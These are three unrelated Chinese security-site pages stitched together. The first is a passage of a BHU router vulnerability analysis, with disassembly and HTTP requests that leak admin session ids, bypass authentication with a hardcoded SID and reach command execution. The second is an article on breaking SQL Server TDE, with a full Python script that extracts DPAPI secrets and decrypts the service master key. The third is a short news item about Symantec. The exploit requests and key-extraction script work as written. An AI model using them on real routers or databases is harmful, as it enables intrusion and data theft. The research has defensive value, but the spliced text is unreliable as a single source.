LOAD:004012C4???? ????????????lw????? $a0, file_syslog? # "syslog"

LOAD:004012C8???????????????? addu??? $v0, $a1, $v1

(20)?# 文件的值是否是 “syslog”?

LOAD:004012CC???? ????????????jalr??? $t9 ; strcmp

LOAD:004012D0???????????????? sb????? $zero, 0($v0)

LOAD:004012D4???????????????? lw????? $gp, 0x60+var_50($sp)

(21)?# Jump if value offile” != “syslog” (如果file参数的值不是syslog,那么就jump)

LOAD:004012D8???? ????????????bnez??? $v0, loc_not_syslog

LOAD:004012DC???????????????? addiu?? $v0, $s0, (file_syslog - 0x410000)

(22)?# Return “/var/syslog” if “syslog” (如果是syslog,那么就读取/var/syslog文件)

LOAD:004012E0?? ??????????????lw????? $v0, (path_syslog - 0x416500)($v0)? # "/var/syslog"

LOAD:004012E4???????????????? b

loc_4012F0 LOAD:004012E8???????????????? nop

LOAD:004012EC? # ---------------------------------------------------------------------------

LOAD:004012EC LOAD:004012EC loc_4012EC:????????????????????????????? # CODE XREF: get_file_handler+C8|j

??????????????????????????(23)?# 其它情况返回NULL(空值)

LOAD:004012EC?? ??????????????move??? $v0, $zero

上面这个函数主要是说明,如果file参数的值是syslog,那么就会读取var目录下的syslog文件。我花了点时间对于这个页面的参数进行了一些分析得出以下结论:

1. page=[<html页面的名称>]

参数值末端都以.html结尾

打开文件,并且返回值

我尝试过去读取其它文件,但是没用,它只能读取HTML文件

2.xml=[<配置名称>]

访问配置名称

XML类型的值

3.file=[syslog]

访问/var/syslog文件

打开文件并且返回内容

4. cmd=[system_ready]

可以返回管理员密码的第一个和最后一个明文信息,可以提升暴力破解的成功率。

该漏洞还有30秒到达战场

我比较在意的是“file”参数。一般调用系统文件都需要二次验证的,比如cookie,ssid之类的,而且系统日志大部分都有脱敏,不会保留什么敏感信息,但是事实呢?

我于是尝试构造了一个请求。

GET /cgi-bin/cgiSrv.cgi?file=[syslog]?HTTP/1.1

Host: 192.168.62.1

X-Requested-With: XMLHttpRequest

Connection: close

返回的数据包:

HTTP/1.1 200 OK

Content-type: text/plain

Jan? 1 00:00:09 BHU syslog.info syslogd started: BusyBox v1.19.4

Jan? 1 00:00:09 BHU user.notice kernel: klogger started!

Jan? 1 00:00:09 BHU user.notice kernel: Linux version 2.6.31-BHU ([email protected]) (gcc version 4.3.3 (GCC) ) #1 Thu Aug 20 17:02:43 CST 201

/* [omitted] */

Jan? 1 00:00:11 BHU local0.err dms[549]:?Admin:dms:3 sid:700000000000000 id:0 login

/* [omitted] */

Jan??1 08:02:19 HOSTNAME local0.warn dms[549]:?User:admin sid:2jggvfsjkyseala index:3 login

居然包含了管理员的cookie,sid等信息。但是,或许这个cookie是历史cookie,没办法继续使用,你不信?那么我给你演示一下。我用这个cookie带入了一个路由器重启界面,然后,路由器居然重启了??!!

QQ截图20160823172423.png

但是这个漏洞利用起来还是有一些缺陷,假设管理员没登陆过系统,或者把登陆记录清楚了,那么怎么办呢?注意看上面的数据包,它还返回了一个sid:700000000000000。我初步看了一下,所有的必虎路由器的管理员SID都是700000000000000,并且管理员都没有办法更改它。那么我们可否把SID当作cookie来用?答案是可以的,如下图所示。

QQ截图20160823174012.png

该漏洞已经大杀特杀

虽然我们已经有管理员权限了,但是我们继续看看还有什么可以利用的地方。我继续使用IDA检查了POST的函数处理模块,然而它似乎比GET类型的函数模块更加可怕。

img5.png

我把这些if模块又分成了A,B,C三个模块,让我们先看看A模块吧。

LOAD:00403424???????????????? la????? $t9, cgi_input_parse

LOAD:00403428???????????????? nop

(24)?# 调用 cgi_input_parse()

LOAD:0040342C??? ?????????????jalr??? $t9 ; cgi_input_parse

LOAD:00403430???????????????? nop

LOAD:00403434???????????????? lw????? $gp, 0x658+var_640($sp)

(25)?# arg1 = “op”

LOAD:00403438??? ?????????????la????? $a1, aOp???????? # "op"

LOAD:00403440???????????????? la????? $t9, find_val

(26)?# arg0 = request的Body部分

LOAD:00403444? ???????????????move??? $a0, $v0

(27)?# 得到“op”参数的值

LOAD:00403448??? ?????????????jalr??? $t9 ; find_val

LOAD:0040344C???????????????? move??? $s1, $v0

LOAD:00403450???????????????? move??? $s0, $v0

LOAD:00403454???????????????? lw????? $gp, 0x658+var_640($sp)

(28)?# 如果没有“op”参数,那么就退出

LOAD:00403458??? ?????????????beqz??? $s0, b_exit

这个模块会对POST请求进行解析,并且调用cgi_input_parse()。,并且在(25)部分尝试提取参数op的值。而op的值主要是通过find_val函数调用body的部分得到的。如果op有值,就进行到B模块,否则就执行退出。那么我们再来看看B模块的逆向。

LOAD:004036B4???????????????? la????? $t9, strcmp

(29)?# arg1 = “reboot”

LOAD:004036B8??? ?????????????la????? $a1, aReboot???? # "reboot"

(30)?# “op” 的值是否是“reboot”?

LOAD:004036C0?????? ??????????jalr??? $t9 ; strcmp

(31)?# arg0 = body[“op”]

LOAD:004036C4? ???????????????move??? $a0, $s0

LOAD:004036C8???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:004036CC???????????????? bnez??? $v0, loc_403718

LOAD:004036D0???????????????? lui???? $s2, 0x40

这里主要说明,如果op参数的值是reboot,那么会继续到C模块。

(32)?# 检查cookie中的SID值

LOAD:004036D4??????? ?????????jal???? get_cookie_sid

LOAD:004036D8???????????????? nop

LOAD:004036DC???????????????? lw????? $gp, 0x658+var_640($sp)

(33)?# SID的Cookie将作为dml_dms_ucmd的第一个参数传递

LOAD:004036E0???????????????? move??? $a0, $v0

LOAD:004036E4???????????????? li????? $a1, 1

LOAD:004036E8???????????????? la????? $t9, dml_dms_ucmd

LOAD:004036EC???????????????? li????? $a2, 3

LOAD:004036F0???????????????? move??? $a3, $zero

(34)?# 分发任务给dml_dms_ucmd

LOAD:004036F4???????????????? jalr??? $t9 ; dml_dms_ucmd

LOAD:004036F8???????????????? nop

首先,它会先调用一个函数,我把它叫做get_cookie_sid(32部分),然后再把值赋予给dml_dms_ucmd(33部分),然后再调用它(34部分)。随后又会进行到下一步。

(35)?# 在v1参数内保存返回的值

LOAD:004036FC???????????????? move??? $v1, $v0

LOAD:00403700???????????????? li????? $v0, 0xFFFFFFFE

LOAD:00403704???????????????? lw????? $gp, 0x658+var_640($sp)

(36)?# Is v1 != 0xFFFFFFFE? (v1是否不等于0xFFFFFFFE?)

LOAD:00403708???????????????? bne???? $v1, $v0, loc_403774

LOAD:0040370C???????????????? lui???? $a0, 0x40

(37)?# If v1 == 0xFFFFFFFE jump to error message (如果v1等于0xFFFFFFFE,那么就跳转到错误信息)

LOAD:00403710???????????????? b?????? loc_need_login

LOAD:00403714???????????????? nop

/* [omitted] */

LOAD:00403888 loc_need_login:????????????????????????????? # CODE XREF: handle_post+9CC|j

LOAD:00403888???????????????? la????? $t9, mime_header

LOAD:0040388C???????????????? nop

LOAD:00403890???????????????? jalr??? $t9 ; mime_header

LOAD:00403894???????????????? addiu?? $a0, (aTextXml - 0x400000)? # "text/xml"

LOAD:00403898???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:0040389C???????????????? lui???? $a0, 0x40

(38)?# 输出错误信息“need_login”

LOAD:004038A0???????????????? la????? $t9, printf LOAD:004038A4?????? b?????? loc_4038D0

LOAD:004038A8???????????????? la????? $a0, aReturnItemResu? # "<return>\n\t<ITEM result=\"need_login\""...

但是假设我们不带入然后值到v1参数(即SID为NULL),那么会怎么样呢?我于是尝试了一下。

QQ截图20160823190916.png

然后我分析了一下这整个程序的逻辑:

1.收到op参数

2.调用get_cookie_sid

3.调用dms_dms_ucmd

虽然在GET模块,这个指令应该会执行的,但是在POST的过程中始终会验证SID,这个就有点蛋疼了。怎么绕过去呢?

继续分析get_cookie_sid函数模块。

LOAD:004018C4 get_cookie_sid:????????????????????????? # CODE XREF: get_xml_handle+20|p

/* [omitted] */

LOAD:004018DC???????????????? la????? $t9, getenv

LOAD:004018E0???????????????? lui???? $a0, 0x40

(39)?# 得到HTTP cookies

LOAD:004018E4???????????????? jalr??? $t9 ; getenv

LOAD:004018E8???????????????? la ?????$a0, aHttp_cookie? # "HTTP_COOKIE"

LOAD:004018EC???????????????? lw????? $gp, 0x20+var_10($sp)

LOAD:004018F0???????????????? beqz??? $v0, failed

LOAD:004018F4???????????????? lui???? $a1, 0x40

LOAD:004018F8???????????????? la????? $t9, strstr

LOAD:004018FC???????????????? move??? $a0, $v0

(40)?# cookie中是否包含“sid=”?

LOAD:00401900???????????????? jalr??? $t9 ; strstr

LOAD:00401904???????????????? la????? $a1, aSid??????? # "sid="

LOAD:00401908???????????????? lw????? $gp, 0x20+var_10($sp)

LOAD:0040190C???????????????? beqz??? $v0, failed

LOAD:00401910???????????????? move??? $v1, $v0

/* [omitted] */

LOAD:00401954 loc_401954:????????????????????????????? # CODE XREF: get_cookie_sid+6C|j

LOAD:00401954????????????? ???addiu?? $s0, (session_buffer - 0x410000)

LOAD:00401958

LOAD:00401958 loc_401958:????????????????????????????? # CODE XREF: get_cookie_sid+74|j

LOAD:00401958???????????????? la????? $t9, strncpy

LOAD:0040195C???????????????? addu??? $v0, $a2, $s0

LOAD:00401960???????????????? sb????? $zero, 0($v0)

(41)?# 在“session_buffer”中复制cookie的值

LOAD:00401964???????????????? jalr??? $t9 ; strncpy

LOAD:00401968???????????????? move??? $a0, $s0

LOAD:0040196C???????????????? lw????? $gp, 0x20+var_10($sp)

LOAD:00401970???????????????? b?????? loc_40197C

(42)?# 把这个值赋予cookie

LOAD:00401974???????????????? move??? $v0, $s0

get_session_cookie在得到一个请求后,会检查cookie中是否有sid=这个字符集。如果有,那么某处全局变量将会赋值一个cookie给该参数。当调用dml_dms_ucmd时,返回的值都会用作于第一个参数,而这一切都是在libdml.so函数库中实现。那么也就是说,对于cookie的效验都是在这个库中进行的,那么让我们来看一下这个库。

.text:0003B368 .text:0003B368???????????????? .globl dml_dms_ucmd

.text:0003B368 dml_dms_ucmd:

.text:0003B368

/* [omitted] */

.text:0003B3A0???????????????? move??? $s3, $a0

.text:0003B3A4???????????????? beqz??? $v0, loc_3B71C

.text:0003B3A8???????????????? move??? $s4, $a3

(43)?# 记住 a0 = SID cookie的值

???????????????????????????????# 或者可以说是,如果a0什么都不包含(NULL),那么s1 = 0xFFFFFFFE

.text:0003B3AC???????????????? beqz??? $a0, loc_exit_function

.text:0003B3B0???????????????? li????? $s1, 0xFFFFFFFE

/* [omitted] */

.text:0003B720 loc_exit_function:?????????????????????????? # CODE XREF: dml_dms_ucmd+44|j

.text:0003B720????????????????????????????????????????? # dml_dms_ucmd+390|j ...

.text:0003B720???????????????? lw????? $ra, 0x40+var_4($sp)

???????????????????????????(44)?# 返回 s1 (s1 = 0xFFFFFFFE)

.text:0003B724???????????????? move??? $v0, $s1

/* [omitted] */

.text:0003B73C???????????????? jr????? $ra

.text:0003B740???????????????? addiu?? $sp, 0x40

.text:0003B740? # End of function dml_dms_ucmd

只要我第一个参数不要带入空(NULL),那么就不会返回0xFFFFFFFE(-2)。也就是说我cookie随便填写一个都可以成为管理员?!

QQ截图20160823194419.png

好吧,我随便写了个cookie,然后进行重启,依然生效了。。。。。花费那么长时间,居然发现cookie可以随意设定!但是一切都是值得的,我起码知道这个问题出在哪里了。

漏洞已经跑到对方血池大杀特杀了

我简单整理了一下前面的工作,然后总结出以下方法可以得到管理员权限:

1. SID写任意字符,只要不为空就行。

2. 查看系统日志得到管理员的cookie

3. SID的值为700000000000000即可

我们现在已经知道了POST模块的处理过程和op参数的基本逻辑,但是这个模块还可以处理一些XML请求,让我们对它继续分析下去。

/* [omitted] */

LOAD:00402E2C???????????????? addiu?? $a0, $s2, (aContent_type - 0x400000)? # "CONTENT_TYPE"

LOAD:00402E30???????????????? la????? $t9, getenv

LOAD:00402E34???????????????? nop

(45)?# 收到“CONTENT_TYPE”的请求

LOAD:00402E38???????????????? jalr??? $t9 ; getenv

LOAD:00402E3C???????????????? lui???? $s0, 0x40

LOAD:00402E40???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:00402E44???????????????? move??? $a0, $v0

LOAD:00402E48???????????????? la????? $t9, strstr

LOAD:00402E4C???????????????? nop

(46)?# 是否属于“text/xml” 请求?

LOAD:00402E50???????????????? jalr??? $t9 ; strstr

LOAD:00402E54???????????????? addiu?? $a1, $s0, (aTextXml - 0x400000)? # "text/xml"

LOAD:00402E58???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:00402E5C???????????????? beqz??? $v0, b_content_type_specified

/* [omitted] */

(47)?# 得到SID cookie的值

LOAD:00402F88??????????????? ?jal???? get_cookie_sid

LOAD:00402F8C???????????????? and???? $s0, $v0

LOAD:00402F90???????????????? lw????? $gp, 0x658+var_640($sp)

LOAD:00402F94???????????????? move??? $a1, $s0

LOAD:00402F98???????????????? sw????? $s1, 0x658+var_648($sp)

LOAD:00402F9C ????????????????la????? $t9, dml_dms_uxml

LOAD:00402FA0???????????????? move??? $a0, $v0

LOAD:00402FA4???????????????? move??? $a2, $s3

(48)?# 调用‘dml_dms_uxml’函数模块, 并且对body部分和cookie进行效验

LOAD:00402FA8????????????? ???jalr??? $t9 ; dml_dms_uxml

LOAD:00402FAC???????????????? move??? $a3, $s2

继续往下看,貌似dml_dms_uxml比dml_dms_ucmd更加奇葩。

.text:0003AFF8???????????????? .globl dml_dms_uget_xml

.text:0003AFF8 dml_dms_uget_xml:

/* [omitted] */

(49)?# 把SID的值复制到s1内

.text:0003B030???????????????? move??? $s1, $a0

.text:0003B034???????????????? beqz??? $a2, loc_3B33C

.text:0003B038???????????????? move??? $s5, $a3

???????????????????????????(50)?# 如果SID的值为空(NULL)

.text:0003B03C???????????????? bnez??? $a0, loc_3B050

.text:0003B040???????????????? nop

.text:0003B044???????????????? la????? $v0, unk_170000

.text:0003B048???????????????? nop

???????????????????????????(51)?# 那么就把空的SID值替换为一个硬件编码(700000000000000

.text:0003B04C???????????????? addiu?? $s1, $v0, (a70000000000000 - 0x170000)? # "700000000000000"

/* [omitted] */

这个逻辑的感觉就好像是,如果你的没有钱买东西,那么我会给你钱去消费。OMG!真TM人性化的设计!总的来说,如果要使用这个功能,cookie可以直接为空。那么可以构造数据包如下:

POST /cgi-bin/cgiSrv.cgi HTTP/1.1

Host: 192.168.62.1

Content-Type: text/xml

X-Requested-With: XMLHttpRequest

Content-Length: 59

Connection: close

<cmd>

<ITEM?cmd="traceroute"?addr="127.0.0.1" />

</cmd>

继续研究发现还可以命令执行:

QQ截图20160824123149.png

这个路由器就像个定时炸弹一样,搞一台在家里面可能莫名其妙的就被人家装上后门监听着了。

* 参考来源:ioactive,本文由Arthur编译,转载请注明来自FreeBuf(Freebuf.COM)

这些评论亮了

  • tonybreak(3级)回复
    支持!这种分析让新手的我学到不少了啊~怎么现在有一种看到路由器都想拆的冲动呀~
    )9(亮了
发表评论

已有 14 条评论

  • tonybreak?(3级)?2016-08-25回复1楼

    支持!这种分析让新手的我学到不少了啊~怎么现在有一种看到路由器都想拆的冲动呀~

    亮了(9)
    • zhutougg?2016-08-25回复

      @ tonybreak? 拆吧,反正你会再会一个的

      亮了(0)
  • He1el?2016-08-25回复2楼

    中出FB客服妹纸。。。

    亮了(3)
  • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-08-25回复3楼

    我:队长!我们中出了一个He1el!
    队长:你们怎么处置他的?!
    我:我刚才不是说了嘛

    亮了(2)
  • 必虎广告?2016-08-25回复4楼

    最近到处能看到必虎广告

    亮了(0)
    • 必虎广告?2016-08-25回复

      @ 必虎广告 看看广告,再看看这篇,有种莫名的喜感

      亮了(1)
  • raistlin00?(4级)?2016-08-25回复5楼

    必虎和奇虎啥关系啊

    亮了(0)
    • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-08-25回复

      @ raistlin00? 隔壁老王的关系。

      亮了(1)
  • 腾讯手机管家?2016-08-25回复6楼

    这算漏洞的话 电信每个光猫都有漏洞了,我会瞎说

    亮了(0)
    • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-08-25回复

      @ 腾讯手机管家 我只信你说的最后四个字 :wink:

      亮了(0)
      • 腾讯手机管家?2016-08-25回复

        @ ArthurKiller? 电信光猫裸奔三倍速啊

        亮了(1)
      • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-08-25回复

        @ 腾讯手机管家 警察叔叔,就是他!

        亮了(0)
  • subry?(1级)?2016-08-25回复7楼

    感觉原文后面的料更劲爆啊。。 :mrgreen:

    亮了(0)
  • nklper?2016-08-26回复8楼

    这种看似严谨的文章,很具有误导性。 能当面向大家演示如何利用最好了。

    亮了(1)
表情插图

取消

ArthurKiller

ArthurKiller

窃.格瓦拉驻FreeBuf办事处

58 篇文章343 条评论

相关阅读

  • BoxSoft WAV to MP3 Converter 软件漏洞分析(CVE-2015-7243)
  • Oracle out-of-band release for Java SE Vulnerability漏洞分析(CVE-2016-0636)
  • nginx爆整数溢出漏洞最新情况(2013-04-29)
  • 由家用路由器构成的可“自我复制”僵尸网络
  • [技术分析]波士顿爆炸案Redkit漏洞利用包解析

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中...

0daybank

tde

tde

投稿

微软SQL Server透明数据加密(TDE)剖析及破解(上)

FireFrank2016-03-24+5128727人围观 ,发现 1 个不明物体安全管理网络安全

本次调查开始于一个我和客户讨论:他们是否应该安装TDE。如果我们要选出一个最合适的进行静态数据加密的工具,那么非TDE莫属,但是它有一个明显的缺陷。

视频

任何加密自己数据的软件都有一个功能性问题:如果它希望使用自己的数据,就需要对自身数据进行解密。举个例子,如果SQL服务器想要向加密数据库中写入数据,之后把数据返回给用户,他需要合适的解密密钥进行这个操作。

如果系统还需要在无需人工干预的情况下就可以boot,敏感功能无法被单独嵌入到保护性硬件中,之后密钥必须储存在系统的某个位置中,以便服务器在启动时能够访问它。然而,如果密钥被存储在系统中,那所有人都有接入权限,如果整个系统被北方,密钥也会被备份,所以所有数据都会被轻易读取。

“很明显”,解决方法是在储存所有数据之前加密密钥,微软的TDE就是这么做的。不幸的是,它并没有真的解决这个问题,因为为了解密这个已经加密的密钥,你还需要存储这个用于解密的密钥。所有的这些花里胡哨的行为都是为了掩饰密钥的存储。

显然解决方法还是加密加密的密钥…而这么做的工具呢还是微软的TDE,但是它还是存在相同的问题。它一直这么做。虽然最终你不得不停止增加层数并存储最底层的为加密密钥,只要找到这个密钥,那所有的加密就会瞬间土崩瓦解。

这种基本的、不可避免的逻辑必然性让很多人选择拒绝使用这个软件。大家不相信这样一个看似毫无意义、甚至毫无诚信可言的安全机制是由如此大型的公司出售的,简直太可怕了。一些人必须要看到这个机制之后才能相信,所以我们决定用这篇文章详细解释TDE以及如何破解TDE。

TDE加密

在我们开始破解TDE之前,让我们先看看所有数据是如何被加密的。下面这张图提供了我们所需要的所有加密步骤。如果这种方法不是模糊安全的模范,那我不知道这是什么了。

tde.jpg

实际上是略有变化的,因为在一些情况下,访问相同数据的路径有很多,还有一些整个过程中非常微妙的地方并没有被提到。给出的路径是我们最感兴趣的问题,因为路径很容易被复制。

我们从底层开始介绍,底层最基础的密钥匙LSA密钥,其他层都在这层之上。它被轻微模糊处理(“代替密码”)后储存在磁盘上的注册表中,但是这点是众所周知的,所以它所提供的方式并不安全。

由于LSA密钥和其他几个密钥都储存在其他文件中,整个体系就会分裂。蓝色图表表明啦包含各种信息关键部分的基础文件:

1、注册表备份或者来自%WINDIR%/System32/Config的配置单元文件SYSTEM,SECURITY和SOFTWARE

2、来自%WINDIR%/System32/Microsoft/Protect/S-1-5-18的DPAPI的主键

3、主数据库和目标用户数据库。数据库可以从一个SQL备份文件或raw .mdf文件中恢复。在使用.mdf文件恢复时,拥有相应的.ldf数据库日志文件尽管不是必须的,但是也非常有用。

在知道这些信息后,所有的加密密钥都可以无需暴力破解直接恢复。

破解TDE

从SQL server的角度看,掌控所有的密钥就是Sevice Master Key(SMK)。对每个服务器/集群来说,它都是独一无二的,保护着它上面的每一层。它被储存在从未使用TDE中加密的主数据库中。然而,它在主数据库中被储存成一个加密值,所以还是需要解密。

破解TDE的一般方法是从目标服务区或者备份中拷贝数据库,然后把数据库放在一个新的由我们控制的“恢复”SQL服务器中。通过复制SMK,所有的加密的数据库都会自动被恢复服务器上的SQL服务器自动解密。恢复服务器上的数据可以被查看、导出等。所以我们不需要完全了解SQL服务器使用数据库加密密钥做了什么,因为我们将使用它对付它自己来为我们解密所有内容。

下面这个简单的python脚本用于文件收集以及提取SMK。涉及到的大部分工作都在恢复DPAPI密钥,多亏了creddump和dpapick项目出色的工作,我们成功拿到了这个密钥。

#!/usr/bin/env python 
# -*- coding: utf-8 -*- 

from DPAPI.Core import blob # https://pypi.python.org/pypi/dpapick/0.3 
from DPAPI.Core import masterkey 
from DPAPI.Core import registry 
from optparse import OptionParser 
from Registry import Registry # https://github.com/williballenthin/python-registry 
from bitstring import ConstBitStream 

import re 
import os 
import sys 

def search_with_blob(entropy, dpapi_system, mkp, tdeblob): 
  """Try decrypting with each master key""" 
  wblob = blob.DPAPIBlob(tdeblob) 
  mks = mkp.getMasterKeys(wblob.mkguid) 
  for mk in mks: 
    if mk.decrypted: 
      wblob.decrypt(mk.get_key(), entropy) 
      if wblob.decrypted: 
        print("Decrypted service master key: %s" % wblob.cleartext.encode('hex')) 
      else: 
        print("Decryption failed") 

def search_with_entropy(entropy, dpapi_system, mkp, masterdb): 
  """Search for DPAPI blobs in master database""" 
  masterdb = ConstBitStream(filename = options.masterdb) 
  for found in masterdb.findall('0x01000000D08C9DDF0115D1118C7A00C04FC297EB', bytealigned = True): 
    blobsegment = masterdb[found:found+512*8]  # Extraneous bytes ignored 
    search_with_blob(entropy, dpapi_system, mkp, blobsegment.tobytes()) 

parser = OptionParser() 
parser.add_option("--masterkey", metavar='DIRECTORY', dest='masterkeydir') 
parser.add_option("--system", metavar='HIVE', dest='system') 
parser.add_option("--security", metavar='HIVE', dest='security') 
parser.add_option("--software", metavar='HIVE', dest='software') 
parser.add_option("--masterdb", metavar='FILE', dest='masterdb') 

(options, args) = parser.parse_args() 

reg = registry.Regedit() 
secrets = reg.get_lsa_secrets(options.security, options.system) 
dpapi_system = secrets.get('DPAPI_SYSTEM')['CurrVal'] 

mkp = masterkey.MasterKeyPool() 
mkp.loadDirectory(options.masterkeydir) 
mkp.addSystemCredential(dpapi_system) 
mkp.try_credential_hash(None, None) 

with open(options.software, 'rb') as f: 
  reg = Registry.Registry(f) 
  regInstances = reg.open('Microsoft\\Microsoft SQL Server\\Instance Names\\SQL') 
  for v in regInstances.values(): 
    print("Checking SQL instance %s" % v.value()) 
    regInst = reg.open('Microsoft\\Microsoft SQL Server\\%s\\Security' % v.value()) 
    entropy = regInst['Entropy'].value() 
    search_with_entropy(entropy, dpapi_system, mkp, options.masterdb) 

方便的是,脚本是跨平台的,所以它不需要在Windows机器上运行。这就意味着在目标服务区上不需要安装软件,一些文件渗出(或使用备份)就可以了。

一旦DPAPI密钥被恢复了,这个脚本搜索主数据库获得加密的SMK。这些SMK使用特殊的DPAPI blob结构被加密。DPAPI结构总是包含供应商GUID:df9d8cd0-1501-11d1-8c7a-0c04fc297eb,这个ID很容易被找到。由于主数据库未被加密,我们可以只使用SQL server就能提取ID,但是需要更多的协调和尝试。因为GUID非常受限制,这种快速且卑鄙的在主数据库中直接搜索方法被用于证明概念。这也意味着即使文件格式不同,它也同样适用于SQL备份文件或者本地.dmf文件。

执行只指向所需文件,然后继续:

$ ./tde.py --masterkey=S-1-5-18 --system=SYSTEM --security=SECURITY --software=SOFTWARE --masterdb=master.mdf

其结果是简单的未加密SMK:

Decrypted service master key: 999338193ab37c38c3aa99df062e2f5ca96b7dbc87542af9d61e0dc8a473c1f9

SQL Server有一个方式备份并恢复SMK,使用命令行:

BACKUP SERVICE MASTER KEY TO FILE = 'some-file-to-write-to' 
    ENCRYPTION BY PASSWORD = 'some-password' 

另外,他们可以被恢复到一个新的服务器,使用命令行:

RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' 
    DECRYPTION BY PASSWORD = 'some-password' [FORCE]

另外一些主服务器密钥也可以利用SMK恢复来被解密,数据库访问。不幸的是,我们没有来自目标机器的SMK的备份文件(实际上在很多攻击的情况下,我们可以只知性备份命令,但是没有进行备份恢复等)。

在这个例子里,我们有一个恢复等原始密钥,但是没有备份文件,一个明显的安装SMK的方式是在恢复计算机上使用DPAPI系统凭证加密SMK,然后储存在主数据库中。dpapick库目前并不支持加密,我很烦躁啊,所以我跳过了现在这个不花太多时间和精力的方法。相反,我使用了那种快速卑鄙的方法,创建一个SMK备份文件,但是它手动操作较多。这些都是可以被简化的,但是为了证明这个概念,我使用了一个简单的cuckoo’s egg方法,视频中展示了这个方法-终端到中断的恢复demo。这种方法使用恢复密钥生成一个SMK备份文件,我们可以再我们的恢复SQL server上进行恢复。

下面这些步骤是使用新的SMK备份文件恢复一个TDE备份(来自.bak文件)来恢复服务器:

1、使用单用户模式启动SQL server(-m startup option)

2、恢复主数据库

RESTORE DATABASE MASTER FROM DISK = 'c:\...\master.bak' WITH REPLACE;

3、重启SQL服务(仍然是单用户模式)

4、添加管理员用户/重置管理员密码

5、在普通多用户模式下重启服务

6、使用FORCE选项恢复SMK

ESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' 
    DECRYPTION BY PASSWORD = 'some-password' FORCE

7、恢复目标数据库

8、刷新数据库列表

下面这些步骤用于恢复.MDF/.LDF文件:

1、停止SQL服务

2、复制 .mdf/.ldf文件,代替现在的主数据库

3、在单用户模式下开启SQL服务器(-m startup option)

4、增加管理员用户/重置管理员密码

5、在普通多用户模式下重启服务

6、使用FORCE选项恢复SMK

RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' 
    DECRYPTION BY PASSWORD = 'some-password' FORCE

7、离线拿下目标数据库

8、让目标数据库再次在线

9、刷新数据库列表

在这点上,我们完全恢复并能够访问加密数据库

在上面的内容中,我们介绍了TDE机制及如何破解TDE,之后的文章我们将继续深入TDE,揭秘是否应该继续使用TDE。

* 原文链接:simonmcauliffe,FB小编FireFrank编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

发表评论

已有 1 条评论

  • fs?2016-03-24回复1楼

    很详细,不错!

    亮了(4)
表情插图

取消

FireFrank

FireFrank

这家伙太懒,还未填写个人描述!

65 篇文章1 条评论

相关阅读

  • FreeBuf公开课:轻松的方式科普什么是SQL注入攻击(第三集)
  • 优化SQLMAP的批量测试功能
  • 微软将会修复两个严重漏洞,涉及Windows和IE浏览器
  • 微软SQL Server透明数据加密(TDE)剖析及破解(上)
  • 微软“WebDAV”提权漏洞(cve-2016-0051)初探

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中...

0daybank

赛门铁克杀毒软件

赛门铁克杀毒软件

投稿

赛门铁克想要重新发明杀毒软件

Mystery2014-05-08+564861人围观 ,发现 13 个不明物体资讯

?

2010年5月19日,加州科尔马镇,迈克菲安全软件和赛门铁克的诺顿杀毒软件被一同摆在货架上

25年前,赛门铁克(Symantec Corp.)发明了商用杀毒软件来保护电脑免遭黑客的攻击。如今,该公司称这样的战术注定将失败。

赛门铁克负责信息安全的高级副总裁戴伊(Brian Dye)说,杀毒软件已死,他们认为杀毒软件无论如何都不再是一项赚钱的业务。

杀毒软件的目的在于防止黑客侵入电脑。但如今不管有没有杀毒软件的保护,黑客常常会侵入电脑。有鉴于此,戴伊正在牵头赛门铁克的一项再造行动,该行动反映出每年规模达700亿美元的网络安全行业出现了更广泛的转变。

多家公司开发的新技术不是努力防止黑客的侵入,而是假定黑客已侵入,如何想方设法找到他们并将损失降至最低。

赛门铁克本周也加入这些公司的队伍,将创建自己的响应小组来帮助被黑客入侵的企业。六个月内,该公司计划销售有关具体威胁的情报介绍,以便使客户不仅知道自己被攻击,还知道为何被攻击。此外,赛门铁克还正在开发一种在网络内寻找更先进恶意软件的技术。

戴伊说,赛门铁克不打算放弃诺顿(Norton)杀毒软件,但将在新的产品线中寻找收入增长点。他表示,如果客户从防止黑客入侵转变为对黑客攻击进行侦测和响应,那么收入增长就将来自侦测和响应。

利用0day漏洞的恶意程序日益增多,杀毒软件赶不上漏洞发现的速度,无法阻止黑客入侵,虽然这就是它们存在的目的。既然无力阻止恶意程序感染用户的电脑,杀毒软件开发商使用的策略显然有问题,赛门铁克为此表示要重塑安全行业:不是防止黑客侵入,而是假定黑客已侵入,如何将用户数据损失降至最小。赛门铁克准备从防止黑客入侵转变为对黑客攻击进行侦测和响应,告诉客户是否被攻击,以及为何会被攻击。

发表评论

已有 13 条评论

  • jacker?(6级)Ubuntu Arch Vim爱好者?2014-05-08回复1楼

    开来有要出卖杀毒软件了

    亮了(1)
  • ws?2014-05-08回复2楼

    不卖软件卖服务了么

    亮了(0)
  • 584250550?(1级)?2014-05-08回复3楼

    在黑客面前,杀软厂商自愧不如啊

    亮了(4)
  • notme?2014-05-08回复4楼

    早就这样了,不然黑阔是吃饱了撑着才做苦逼免杀做绕过?

    亮了(0)
  • flowind?2014-05-09回复5楼

    消耗大量资金收购0day..
    针对0day向公司出售补丁.
    在linux或者windows发布补丁之前就用上安全就好很多.

    亮了(0)
  • YiffyYan?2014-05-09回复6楼
